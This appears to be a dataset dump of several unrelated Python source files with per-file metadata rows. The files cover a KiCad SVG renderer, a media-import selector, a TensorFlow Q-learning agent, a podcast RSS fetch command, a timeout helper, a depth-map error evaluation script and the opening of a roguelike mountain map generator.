print_component(args.libraries, lib, name, val, ref, pos,
remapping=remapping))
sys.exit(0)
bb = board.ComputeBoundingBox()
document = empty_svg(
width="{}cm".format(bb.GetWidth()/10000000.0),
height="{}cm".format(bb.GetHeight()/10000000.0),
viewBox="0 0 {} {}".format(ki2dmil(bb.GetWidth()), ki2dmil(bb.GetHeight())))
wrapper = etree.SubElement(document.getroot(), "g",
transform="translate({}, {})".format(ki2dmil(-bb.GetX()), ki2dmil(-bb.GetY())))
wrapper.append(get_board_substrate(board, style, not args.no_drillholes))
walk_components(board, lambda lib, name, val, ref, pos:
component_from_library(wrapper, args.libraries, lib, name, val, ref, pos,
placeholder=args.placeholder, remapping=remapping))
document.write(args.output)
| 38.217687 | 104 | 0.572742 | 2,091 | 16,854 | 4.540411 | 0.20373 | 0.01264 | 0.019907 | 0.013693 | 0.179376 | 0.162418 | 0.119865 | 0.103012 | 0.081736 | 0.040025 | 0 | 0.020304 | 0.28112 | 16,854 | 440 | 105 | 38.304545 | 0.763288 | 0.051086 | 0 | 0.169312 | 0 | 0.002646 | 0.112637 | 0 | 0.002646 | 0 | 0 | 0.002273 | 0 | 1 | 0.055556 | false | 0.002646 | 0.026455 | 0.002646 | 0.12963 | 0.034392 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f679b14fc387f30bc2bc6b965bd6ffea44f1f036 | 2,189 | py | Python | src/lib/selectors/Local/core.py | williamwmarx/mtx | 31548b60a4e88124b0384350cbec8df1d88975cb | [
"CC0-1.0"
] | null | null | null | src/lib/selectors/Local/core.py | williamwmarx/mtx | 31548b60a4e88124b0384350cbec8df1d88975cb | [
"CC0-1.0"
] | null | null | null | src/lib/selectors/Local/core.py | williamwmarx/mtx | 31548b60a4e88124b0384350cbec8df1d88975cb | [
"CC0-1.0"
] | null | null | null | import os
from pathlib import Path
from shutil import copyfile
from lib.common.selector import Selector
from lib.common.etypes import Etype, Index
from lib.common.exceptions import SelectorIndexError
BASE = Path("/mtriage")
class Local(Selector):
"""A simple selector for importing local files into mtriage.
It recursively finds every file in a source_folder specified in the config
(see example script 4.select_local.sh) and imports each file into its own
element. The element ID is the file's name concatenated with its extension.
n.b. the directory being imported must be located within the mtriage
directory on the mtriage host to be accessible inside the docker container
(the media folder is recommended).
"""
out_etype = Etype.Any
def __init__(self, *args):
super().__init__(*args)
def is_aggregate(self):
return "aggregate" in self.config and self.config["aggregate"]
def index(self, config):
src = Path(config["source"])
abs_src = BASE / src
if not os.path.exists(abs_src):
raise SelectorIndexError(
f"The 'source' folder {src} could not be found. Ensure it is in the same directory asmtriage."
)
return self._index(abs_src)
def _index(self, abs_src):
self.logger("Indexing local folder...")
results = [["id", "path"]]
excluded = self.config.get("exclude", [])
for root, _, files in os.walk(abs_src):
main = Path(abs_src)
root = Path(root)
for file in files:
if file == ".mtbatch" or file in excluded:
continue
fp = root / file
elid = root.name if (root.name != main.name) else fp.stem
results.append([elid, fp])
self.logger(f"indexed file {fp} as: {elid}")
if self.is_aggregate():
# `self.results` used in `retrieve_element` for paths.
self.results = results[1:]
# NB: hacky way to just make `retrieve_element` run just once.:
return Index([["id"], ["IS_AGGREGATE"]])
return Index(results)
def retrieve_element(self, element, config):
if self.is_aggregate():
og_folder = Path(config["source"])
return Etype.Any(og_folder.name, paths=[x[1] for x in self.results])
else:
return Etype.Any(element.id, paths=[element.path])
module = Local
| 31.271429 | 101 | 0.703518 | 326 | 2,189 | 4.634969 | 0.389571 | 0.023825 | 0.025811 | 0.022502 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001683 | 0.185473 | 2,189 | 69 | 102 | 31.724638 | 0.845766 | 0.264504 | 0 | 0.043478 | 0 | 0.021739 | 0.13723 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108696 | false | 0 | 0.130435 | 0.021739 | 0.413043 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f67b5cd19685b6f6168adfcb635e7a19ce5a128b | 11,335 | py | Python | simulateur/rn/Rn.py | thearsenik/sport-ironcar | bc48ee842bccbe4657216f3ef559c3f00a0fe944 | [
"MIT"
] | null | null | null | simulateur/rn/Rn.py | thearsenik/sport-ironcar | bc48ee842bccbe4657216f3ef559c3f00a0fe944 | [
"MIT"
] | null | null | null | simulateur/rn/Rn.py | thearsenik/sport-ironcar | bc48ee842bccbe4657216f3ef559c3f00a0fe944 | [
"MIT"
] | null | null | null | import logging
import sys
sys.path.insert(0, '../')
import config
from tensorflow.python.tools import inspect_checkpoint as chkp
import tensorflow as tf
import numpy as np
import random
logging.basicConfig(filename=config.logFile,level=config.logLevelPlayer, format='%(asctime)s %(message)s')
class Rn:
# Future rewards discount
Y = 0.95
# Exploration/exploitation ration (Learning ratio)
ALPHA = 0.01
MIN_ALPHA = 0.1
MAX_ALPHA = 0.85
LAMBDA = 0.0001
NB_EPISODE = 3000
# how far we consider future reward shall be considered when computing qsa
# 1 means all future states are inportant (may be divergent)
# 0 means only the current reward is taken into account
# 0.9363 means 70th step after has less than 1% influence
# 0.99 means 460th step after has less than 1% influence
GAMMA = 0.9363
# 13 actions possibles:
# ---------------------
# 0=tourne a fond a gauche
# ...
# 6=tout droit (action par defaut)
# ...
# 12=tourne a fond a droite
DEFAULT_PREVIOUS_ACTION = [0, 1, 0]
NB_ACTIONS = len(DEFAULT_PREVIOUS_ACTION)
DEFAULT_INPUTS = [0, 0, 1, 0, 1, 0]
NB_INPUTS = len(DEFAULT_INPUTS)
NB_NEURON_BY_LAYER = NB_INPUTS * 4
def __init__(self, performTraining):
self.isTrainingOn = performTraining
self.alpha = 1
self.num_step = 0
self.V = 0
self.previousAction = self.DEFAULT_PREVIOUS_ACTION
tf.reset_default_graph()
self.sess = None
self.optimizer = None
self.inputs = None
self.hidden1 = None
self.hidden2 = None
self.hidden3 = None
self.actions = None
self.rewards = None
self.saver = None
self._q_s_a = None
self.num_episode = 0
self.num_step_max = 0
self.previousStartIndex = 0
self._start()
# cf https://github.com/adventuresinML/adventures-in-ml-code/blob/master/r_learning_tensorflow.py
def _build_network(self):
self.inputs = tf.placeholder(dtype=tf.float32, shape=(None, self.NB_INPUTS))
self._q_s_a = tf.placeholder(dtype=tf.float32, shape=(None, self.NB_ACTIONS))
# outputs : autant que d'actions possibles (on a toujours les meme actions possibles quel que soit l'etat)
#self.actions = tf.placeholder(dtype=tf.float32, shape=(None, self.NB_ACTIONS))
# recompense
#rewards = tf.placeholder(dtype=tf.float32, shape=(None,1))
#with tf.variable_scope('policy'):
# trois couches de nb_inputs neurones (autant que d'entrees), fully connected => dense
self.hidden1 = tf.layers.dense(self.inputs, self.NB_NEURON_BY_LAYER, activation=tf.nn.relu, kernel_initializer = tf.contrib.layers.xavier_initializer())
self.hidden2 = tf.layers.dense(self.hidden1, self.NB_NEURON_BY_LAYER, activation=tf.nn.relu, kernel_initializer = tf.contrib.layers.xavier_initializer())
# self.hidden3 = tf.layers.dense(self.hidden2, self.NB_NEURON_BY_LAYER, activation=tf.nn.relu, kernel_initializer = tf.contrib.layers.xavier_initializer())
# couche de sortie, autant que d'actions possibles sans fonction d'activation
# on voudrait que la sortie colle avec l'esperance de reward ?
self.actions = tf.layers.dense(self.hidden2, self.NB_ACTIONS, activation=None, kernel_initializer = tf.contrib.layers.xavier_initializer())
# traitement de la sortie pour avoir que un 1 et des 0
#threshold_to_max = tf.less_equal(tf.reduce_max(self.actions), self.actions)
#cast booleans to float32 (True => 1, False => 0)
#self.out = tf.cast(threshold_to_max, tf.float32)
# façon de faire originelle:
loss = tf.losses.mean_squared_error(self._q_s_a, self.actions)
self._optimizer = tf.train.AdamOptimizer().minimize(loss)
# Autre façon de faire:
#cross_entropy = tf.nn.sigmoid_cross_entropy_with_logits(labels=actions, logits=self.actions, name="cross_entropy")
#loss = tf.reduce_sum(tf.multiply(rewards, cross_entropy, name="rewards"))
#decay_rate=0.99
#self.optimizer = tf.train.RMSPropOptimizer(self.ALPHA, decay=decay_rate).minimize(loss)
# tf.summary.histogram("input_data", self.inputs)
# tf.summary.histogram("hidden_1", self.hidden1)
# tf.summary.histogram("hidden_2", self.hidden2)
# tf.summary.histogram("hidden_3", self.hidden3)
# tf.summary.histogram("sortie", self.actions)
# tf.summary.histogram("action", self.out)
merged = tf.summary.merge_all()
self.saver = tf.train.Saver()
# grads = tf.gradients(loss, [hidden_w, logit_w])
# return pixels, actions, rewards, out, optimizer, merged, grads
return merged
def _start(self):
if self.sess != None:
self.sess.close()
tf.reset_default_graph()
merged_sym = self._build_network()
# Init new session with default graph
self.sess = tf.Session()
# writer = tf.summary.FileWriter('./log/train', self.sess.graph)
try:
weights = open(config.rnCheckpointsFile+'.index', 'r')
weights.close
logging.debug("RN initialized from file :"+config.rnCheckpointsFile)
self.saver.restore(self.sess, tf.train.latest_checkpoint(config.rnCheckpointsDir))
except FileNotFoundError:
logging.debug("RN initialized randomly...")
self.sess.run(tf.global_variables_initializer())
def startNewGame(self, startIndex):
self.num_episode += 1
if self.num_step > self.num_step_max:
self.num_step_max = self.num_step
self.num_step = startIndex
# on reevalue numstepmax a chaque changement de startIndex
if self.previousStartIndex != startIndex:
self.previousStartIndex = startIndex
self.num_step_max = 40
#save model
def save(self):
self.saver.save(self.sess, config.rnCheckpointsFile+"_"+str(self.num_episode)+".ckpt")
# method used to process a new state provided by the environment
def compute(self, inputs):
# inputs are already well formatted
##### Traitement RN #####
# Get the Rn output for the given input
# In fact, as we are exploring, either get Rn output, either get random output...
result, isRandomChoice = self._choose_action(inputs)
return result, isRandomChoice
# Replay a batch to train the nn.
# each item of batch is composed of:
# - the inputs (angle, distance, height, the previous previous action (as flat array of all possible action))
# - the previous action
# - the reward
# - the next state as (new angle, new distance, new height, the action (as flat array of all possible action) that lead to this state (previous action)
def replay(self, batch):
states = np.array([val[0] for val in batch])
notDeterminedNextState = np.zeros(self.NB_INPUTS)
next_states = np.asarray([(notDeterminedNextState if val[3] is None else val[3]) for val in batch])
# predict Q(s,a) given the batch of states
q_s_a = self._predict_batch(states)
# predict Q(s',a') - so that we can do gamma * max(Q(s'a')) below
q_s_a_d = self._predict_batch(next_states)
# setup training arrays
x = np.zeros((len(batch), self.NB_INPUTS))
y = np.zeros((len(batch), self.NB_ACTIONS))
for i, b in enumerate(batch):
state, action, reward, next_state = b[0], b[1], b[2], b[3]
# get the current q values for all actions in state
current_q = q_s_a[i]
# update the q value for action
if next_state is None:
# in this case, the game completed after action, so there is no max Q(s',a')
# prediction possible
current_q[np.argmax(action)] = reward
else:
current_q[np.argmax(action)] = reward + self.GAMMA * np.amax(q_s_a_d[i])
x[i] = state
y[i] = current_q
self._train_batch(x, y)
#logging.info("AFTER TRAIN BATCH...")
self._log_weights()
# As we are exploring, either get Rn output, either get random output by comparing
# random value to a predetermined value alpha...
# At the beginning as there is no knowledge on the environment we explore a lot and set alpha to 1.
# At each step we reduce the probability to choose a random output and reduce alpha value
def _choose_action(self, inputs):
# exponentially decay the alpha value at each choice
self.num_step += 1
#alpha = self.MIN_ALPHA + (self.MAX_ALPHA - self.MIN_ALPHA) * max(0, (1-self.num_episode/self.NB_EPISODE))
#alpha = 0.1
#alpha = 0.1 + (0.9) * max(0, (1-self.num_episode/80))
if self.num_step < self.num_step_max - 20:
alpha = 0.02
#elif self.num_step < self.num_step_max:
# alpha = 0.02 + (0.6) * (self.num_step - (self.num_step_max-80))/80
else:
alpha = 0.1
logging.debug("alpha="+str(alpha))
if self.isTrainingOn and random.random() < alpha:
logging.debug("step="+str(self.num_step)+" ACTION ALEATOIRE")
actions = [0]*self.NB_ACTIONS
choosen_index = random.randint(0, self.NB_ACTIONS - 1)
actions[choosen_index] = 1
return np.array(actions), True
else:
logging.debug("step="+str(self.num_step)+" ACTION CALCULEE")
return self._predict_one(inputs), False
def _predict_one(self, inputs):
logging.debug("PREDICT ONE !!!")
result = self.sess.run(self.actions, feed_dict={self.inputs: inputs.reshape(1, self.NB_INPUTS)})
self._log_weights()
#var = [v for v in tf.trainable_variables() if v.name == "hidden1/weights:0"][0]
#logging.info("hidden1 : %s" % self.sess.run(self.hidden1.eval())
#logging.info("hidden2 : %s" % self.hidden2.eval())
#logging.info("hidden3 : %s" % self.hidden3.eval())
# logging.info("output : %s" % self.actions.eval())
return result[0]
def _predict_batch(self, inputs):
#logging.info("PREDICT BATCH !!!")
self._log_weights()
return self.sess.run(self.actions, feed_dict={self.inputs: np.array(inputs)})
def _train_batch(self, x_batch, y_batch):
#logging.info("TRAIN BATCH !!!")
self._log_weights()
return self.sess.run(self._optimizer, feed_dict={self.inputs: x_batch, self._q_s_a: y_batch})
def _log_weights(self):
if False:
for v in tf.trainable_variables():
logging.info(v.name+":")
logging.info(self.sess.run(v))
| 42.935606 | 163 | 0.610763 | 1,472 | 11,335 | 4.569293 | 0.253397 | 0.022896 | 0.027803 | 0.01457 | 0.209783 | 0.19774 | 0.168153 | 0.127416 | 0.097978 | 0.070175 | 0 | 0.019077 | 0.283194 | 11,335 | 264 | 164 | 42.935606 | 0.808738 | 0.387825 | 0 | 0.068182 | 0 | 0 | 0.02369 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.05303 | 0 | 0.295455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f67cb57866ffbaf57adcdd2f642ca09d35ff5b0c | 521 | py | Python | fanscribed/management/commands/rssfetchall.py | fanscribed/fanscribed | 89b14496459f81a152df38ed5098fba2b087a1d7 | [
"MIT"
] | 8 | 2015-01-05T07:04:02.000Z | 2016-07-19T17:56:46.000Z | fanscribed/management/commands/rssfetchall.py | fanscribed/fanscribed | 89b14496459f81a152df38ed5098fba2b087a1d7 | [
"MIT"
] | 32 | 2015-03-18T18:51:00.000Z | 2021-06-10T20:37:33.000Z | fanscribed/management/commands/rssfetchall.py | fanscribed/fanscribed | 89b14496459f81a152df38ed5098fba2b087a1d7 | [
"MIT"
] | 5 | 2015-02-10T21:15:32.000Z | 2016-06-02T17:26:14.000Z | from django.core.management.base import BaseCommand
from ...apps.podcasts.models import Podcast
class Command(BaseCommand):
help = "Load initial data"
def handle(self, *args, **options):
verbose = (options['verbosity'] > 0)
if verbose:
self.stdout.write('Fetching all RSS feeds.\n\n')
for podcast in Podcast.objects.all():
self.stdout.write(u'- {}\n {}\n\n'.format(
podcast.title, podcast.rss_url))
podcast.fetches.create().start()
| 30.647059 | 60 | 0.614203 | 63 | 521 | 5.063492 | 0.68254 | 0.018809 | 0.094044 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002551 | 0.247601 | 521 | 16 | 61 | 32.5625 | 0.811224 | 0 | 0 | 0 | 0 | 0 | 0.128599 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.166667 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f67d51e4d04cf2aabb8deef1712b57f7257ceacc | 1,003 | py | Python | HW8/EX2/fairpy/items/min_sharing_impl/time_limit.py | ShmuelLa/research-algorithms | 43cab0e9c13ce9ddb9646f7539f1a865e86f9841 | [
"MIT"
] | null | null | null | HW8/EX2/fairpy/items/min_sharing_impl/time_limit.py | ShmuelLa/research-algorithms | 43cab0e9c13ce9ddb9646f7539f1a865e86f9841 | [
"MIT"
] | null | null | null | HW8/EX2/fairpy/items/min_sharing_impl/time_limit.py | ShmuelLa/research-algorithms | 43cab0e9c13ce9ddb9646f7539f1a865e86f9841 | [
"MIT"
] | null | null | null | #!python3
"""
A context for running functions with a time-limit.
Throws an exception if the function does not finish within the limit.
USAGE:
with time_limit(10):
foo()
NOTE: This does not work on Windows. See:
https://stackoverflow.com/a/8420498/827927
"""
import signal
import contextlib
class TimeoutException(Exception): pass
IS_TIME_LIMIT_SUPPORTED = hasattr(signal, "SIGALRM") # only works on Linux
if not IS_TIME_LIMIT_SUPPORTED:
import warnings
warnings.warn("Time-limit is not supported by your operating system.")
@contextlib.contextmanager
def time_limit(seconds):
if IS_TIME_LIMIT_SUPPORTED:
def signal_handler(signum, frame):
raise TimeoutException("Timed out!")
signal.signal(signal.SIGALRM, signal_handler)
signal.alarm(seconds)
try:
yield
finally:
signal.alarm(0)
else:
yield
if __name__=="__main__":
with time_limit(1):
for i in range(1000): print(i)
| 22.795455 | 75 | 0.684945 | 131 | 1,003 | 5.076336 | 0.572519 | 0.108271 | 0.049624 | 0.090226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028424 | 0.228315 | 1,003 | 43 | 76 | 23.325581 | 0.830749 | 0.274177 | 0 | 0.086957 | 0 | 0 | 0.108484 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0.043478 | 0.130435 | 0 | 0.26087 | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f67fc9d4d95893aeeecd1c5378c7a47c828c7677 | 5,476 | py | Python | depth_tests.py | AhmedAlaa10/Consistent_Video_Depth_Estimation | 1a8868eadcf0b2082cdfea8ed339865f0ba8ea01 | [
"MIT"
] | null | null | null | depth_tests.py | AhmedAlaa10/Consistent_Video_Depth_Estimation | 1a8868eadcf0b2082cdfea8ed339865f0ba8ea01 | [
"MIT"
] | null | null | null | depth_tests.py | AhmedAlaa10/Consistent_Video_Depth_Estimation | 1a8868eadcf0b2082cdfea8ed339865f0ba8ea01 | [
"MIT"
] | null | null | null | import os
import re
import sys
from posix import listdir
from shutil import copyfile
from pathlib import Path
import numpy as np
from PIL import Image
from skimage.transform import resize
import utils.image_io
TAG_FLOAT = 202021.25
TAG_CHAR = 'PIEH'
name="shaman_3"
if len(sys.argv) > 1:
name = str(sys.argv[1])
batch_size=1 #TODO
#file_path="/home/umbra/Documents/MPI-Sintel-depth-training-20150305/training/depth/bamboo_2/frame_0001.dpt"
src_path="./data/FN/"+name+"/clean/"
depth_path=os.path.join(src_path,"R_hierarchical2_mc/B0.1_R1.0_PL1-0_LR0.0004_BS"+str(batch_size)+"_Oadam/exact_depth/")
initial_path=os.path.join(src_path,"depth_mc/exact_depth/")
truth_path="../MPI-Sintel-depth-training-20150305/training/depth/"+name+"/"
def depth_read(filename): #Copied from sintel_io.py from http://sintel.is.tue.mpg.de/depth
""" Read depth data from file, return as numpy array. """
f = open(filename,'rb')
check = np.fromfile(f,dtype=np.float32,count=1)[0]
assert check == TAG_FLOAT, ' depth_read:: Wrong tag in flow file (should be: {0}, is: {1}). Big-endian machine? '.format(TAG_FLOAT,check)
width = np.fromfile(f,dtype=np.int32,count=1)[0]
height = np.fromfile(f,dtype=np.int32,count=1)[0]
size = width*height
assert width > 0 and height > 0 and size > 1 and size < 100000000, ' depth_read:: Wrong input size (width = {0}, height = {1}).'.format(width,height)
depth = np.fromfile(f,dtype=np.float32,count=-1).reshape((height,width))
return depth
#depth = depth_read(depth_path)
#print((depth).shape)
#truth = depth_read(truth_path)
#print((truth).shape)
#shape=tuple((depth).shape)
#shape=(436, 1024)
#depth = resize(depth, truth.shape)
#print((depth).shape)
#print(np.nanmin(depth))
#print(np.nanmean(depth))
#print(np.nanmax(depth))
#print(np.nanmin(truth))
#print(np.nanmean(truth))
#print(np.nanmax(truth))
#distance = (truth - depth)
#distance.flatten()
depth_truth_dir= os.path.join(depth_path,"depth_truth")
depth_truth_fmt = os.path.join(depth_truth_dir, "frame_{:06d}")
depth_error_dir= os.path.join(depth_path,"depth_error")
depth_error_fmt = os.path.join(depth_error_dir, "frame_{:06d}")
#Calculate statistical scale factor:
scale_factor=[]
scale_factor_initial=[]
files = os.listdir(truth_path)
files.sort()
for file in files: #["frame_0001.dpt"]:
truth = depth_read(os.path.join(truth_path, file))
depth = depth_read(os.path.join(depth_path, file))
#depth = resize(depth, truth.shape)
depth_initial = depth_read(os.path.join(initial_path, file))
#depth_initial = resize(depth_initial, truth.shape)
truth[truth == 100000000000.0] = np.nan
truth=resize(truth, depth.shape)
scale_factor.append(np.nanmean(truth)/np.nanmean(depth))
scale_factor_initial.append(np.nanmean(truth)/np.nanmean(depth_initial))
print("ScaleFactor for "+file+": "+str(np.nanmean(truth)/np.nanmean(depth)))
scale_factor= np.nanmean(scale_factor)
scale_factor_initial= np.nanmean(scale_factor_initial)
#Compute distance:
ml1 =[]
mse =[]
ml1_norm=[]
mse_norm=[]
ml1_initial =[]
mse_initial =[]
ml1_norm_initial=[]
mse_norm_initial=[]
for file in files: #["frame_0001.dpt"]:
truth = depth_read(os.path.join(truth_path, file))
depth = depth_read(os.path.join(depth_path, file))
#depth = resize(depth, truth.shape)
depth_initial = depth_read(os.path.join(initial_path, file))
#depth_initial = resize(depth_initial, truth.shape)
truth[truth == 100000000000.0] = np.nan
truth=resize(truth, depth.shape)
depth_norm = depth * scale_factor
depth_norm_initial = depth_initial * scale_factor_initial
distance = (truth - depth)
distance_norm = (truth - depth_norm)
ml1.append((np.abs(distance)).mean(axis=None))
mse.append((np.square(distance)).mean(axis=None))
ml1_norm.append((np.abs(distance_norm)).mean(axis=None))
mse_norm.append((np.square(distance_norm)).mean(axis=None))
distance_initial = (truth - depth_initial)
distance_norm_initial = (truth - depth_norm_initial)
ml1_initial.append((np.abs(distance_initial)).mean(axis=None))
mse_initial.append((np.square(distance_initial)).mean(axis=None))
ml1_norm_initial.append((np.abs(distance_norm_initial)).mean(axis=None))
mse_norm_initial.append((np.square(distance_norm_initial)).mean(axis=None))
print("\n"+file+":")
print("min(t,d,n,i):")
print(np.nanmin(truth))
print(np.nanmin(depth))
print(np.nanmin(depth_norm))
print(np.nanmin(depth_initial))
print("max(t,d,n,i):")
print(np.nanmax(truth))
print(np.nanmax(depth))
print(np.nanmax(depth_norm))
print(np.nanmax(depth_initial))
print("Avg(t,d,n,i):")
print(np.nanmean(truth))
print(np.nanmean(depth))
print(np.nanmean(depth_norm))
print(np.nanmean(depth_initial))
#print(mse)
print("ScaleFactor: "+str(scale_factor))
print("Results (Fine-Tuned):")
aml1=np.nanmean(ml1)
amse=np.nanmean(mse)
print("Ml1: "+str(aml1))
print("MSE: "+str(amse))
aml1_norm=np.nanmean(ml1_norm)
amse_norm=np.nanmean(mse_norm)
print("Ml1(norm): "+str(aml1_norm))
print("MSE(norm): "+str(amse_norm))
print("\nResults (Initial):")
aml1_initial=np.nanmean(ml1_initial)
amse_initial=np.nanmean(mse_initial)
print("Ml1: "+str(aml1_initial))
print("MSE: "+str(amse_initial))
aml1_norm_initial=np.nanmean(ml1_norm_initial)
amse_norm_initial=np.nanmean(mse_norm_initial)
print("Ml1(norm): "+str(aml1_norm_initial))
print("MSE(norm): "+str(amse_norm_initial)) | 33.595092 | 153 | 0.721695 | 843 | 5,476 | 4.501779 | 0.183867 | 0.052174 | 0.031621 | 0.023715 | 0.465876 | 0.352833 | 0.240316 | 0.192885 | 0.155995 | 0.140184 | 0 | 0.029885 | 0.113952 | 5,476 | 163 | 154 | 33.595092 | 0.752267 | 0.159606 | 0 | 0.107143 | 0 | 0.008929 | 0.11775 | 0.026264 | 0 | 0 | 0 | 0.006135 | 0.017857 | 1 | 0.008929 | false | 0 | 0.089286 | 0 | 0.107143 | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9c8668c7c7bb6c29a806eaa8d8f7bd5230f9648a | 24,684 | py | Python | mountain_cartographer.py | Naburimannu/beyaz-dag | 50dbe54c8cffecafcf209b30f44bd326d84a424c | [
"BSD-3-Clause"
] | 1 | 2018-02-23T17:31:08.000Z | 2018-02-23T17:31:08.000Z | mountain_cartographer.py | Naburimannu/beyaz-dag | 50dbe54c8cffecafcf209b30f44bd326d84a424c | [
"BSD-3-Clause"
] | 2 | 2016-03-15T04:39:46.000Z | 2016-03-15T04:43:00.000Z | mountain_cartographer.py | Naburimannu/beyaz-dag | 50dbe54c8cffecafcf209b30f44bd326d84a424c | [
"BSD-3-Clause"
] | null | null | null | # Copyright 2016 Thomas C. Hudson
# Governed by the license described in LICENSE.txt
import libtcodpy as libtcod
import cProfile
import scipy.spatial.kdtree
import config
import algebra
import map
import log
from components import *
import miscellany
import bestiary
import ai
import actions
import spells
import quest
import compound_cartographer
import mine_cartographer
import ca_cartographer
import dungeon_cartographer
ROOM_MAX_SIZE = 10
ROOM_MIN_SIZE = 6
MAX_ROOMS = 30
QUARRY_ELEVATION = 3
GHUL_COUNT_GOAL = 2
MINE_ENTRANCE_COUNT = 3
def _random_position_in_region(new_map, region):
"""
Given a region of a map, return an algebra.Location in the region
"""
center = new_map.region_seeds[region]
while True:
candidate = algebra.Location(
libtcod.random_get_int(0, center[0]-5, center[0]+5),
libtcod.random_get_int(0, center[1]-5, center[1]+5))
if (candidate.x < 0 or candidate.y < 0 or
candidate.x >= new_map.width or
candidate.y >= new_map.height):
continue
if new_map.region[candidate.x][candidate.y] == region:
return candidate
def _random_choice_index(chances):
"""
choose one option from list of chances, returning its index
"""
dice = libtcod.random_get_int(0, 1, sum(chances))
running_sum = 0
choice = 0
for w in chances:
running_sum += w
if dice <= running_sum:
return choice
choice += 1
def _random_choice(chances_dict):
"""
choose one option from dictionary of chances, returning its key
"""
chances = chances_dict.values()
strings = chances_dict.keys()
return strings[_random_choice_index(chances)]
def _place_random_creatures(new_map, player):
start_region = new_map.region[player.pos.x][player.pos.y]
terrain_chances = {
'lake' : { None : 10 },
'marsh' : { None : 10, bestiary.swamp_goblin : 10 },
'desert' : { None : 20, bestiary.hyena_pair : 5, bestiary.gazelle : 10 },
'scrub' : { None : 20, bestiary.hyena : 2, bestiary.gazelle : 4,
bestiary.deer : 4, bestiary.wolf : 2 },
'forest' : { None : 20, bestiary.deer : 10, bestiary.wolf_pair : 5,
bestiary.bear : 3 },
'rock' : { None : 10, bestiary.snow_leopard : 1 },
'ice' : { None : 10, bestiary.snow_leopard : 1 }
}
for r in range(len(new_map.region_seeds)):
if (r == start_region or
(new_map.quarry_regions and r in new_map.quarry_regions)):
continue
fn = _random_choice(terrain_chances[new_map.region_terrain[r]])
if fn is not None:
pos = algebra.Location(new_map.region_seeds[r][0], new_map.region_seeds[r][1])
while new_map.is_blocked_at(pos):
pos += actions.random_direction()
pos.bound(algebra.Rect(0, 0, new_map.width-1, new_map.height-1))
if new_map.caravanserai and new_map.caravanserai.bounds.contains(pos):
continue
# print('Creature in region ' + str(r) + ' at ' + str(pos.x) + ' ' + str(pos.y))
fn(new_map, pos, player)
def _inhabit_rotunda(new_map, peak):
goddess = Object(algebra.Location(peak[0], peak[1]), '@', 'The White Goddess', libtcod.white, blocks=True,
interactable=Interactable(use_function=quest.goddess_charge))
new_map.objects.append(goddess)
def _inhabit_quarry(new_map, player):
for i in range(GHUL_COUNT_GOAL):
rgn = new_map.quarry_regions[_random_choice_index([1 for ii in range(len(new_map.quarry_regions))])]
ghul = bestiary.ghul(new_map, _random_position_in_region(new_map, rgn), player)
def _interpolate_heights(new_map, peak):
print('Climbing the shoulders of the mountain')
for p in range(len(new_map.region_elevations)):
if new_map.region_elevations[p] > -1:
continue
dx = new_map.region_seeds[p][0] - peak[0]
dy = new_map.region_seeds[p][1] - peak[1]
p_distance = math.sqrt(dx*dx+dy*dy)
# Hack - conical mountain, but not horrible.
if dx < 0:
cand_x = peak[0]
elif dx == 0:
cand_x = new_map.width
else:
cand_x = new_map.width - peak[0]
if dy < 0:
cand_y = peak[1]
elif dy == 0:
cand_y = new_map.height
else:
cand_y = new_map.height - peak[1]
edge_distance = min(cand_x, cand_y)
elevation = int(9 * ((edge_distance - p_distance) / edge_distance))
new_map.region_elevations[p] = max(elevation, 0)
def _ensure_penultimate_height(new_map, peak, region_tree):
"""
Worldgen will frequently generate a map with a peak at elevation 9,
and nothing else above elevation 7, which prevents easy access to
the summit.
"""
for r in new_map.region_elevations:
if r == 8:
print('Found height 8 at index ' + str(r))
return
(d, i) = region_tree.query(peak, 8)
for r in i:
if new_map.region_elevations[r] == 9:
continue
if new_map.region_elevations[r] == 8:
print('Error? There was no 8, and now there is.')
return
if new_map.region_elevations[r] == 7:
new_map.region_elevations[r] = 8
print('Changed height 7 to 8 at index ' + str(r))
return
print("Couldn't find elevation 8 near the peak.")
def _extend_hills(new_map, peak):
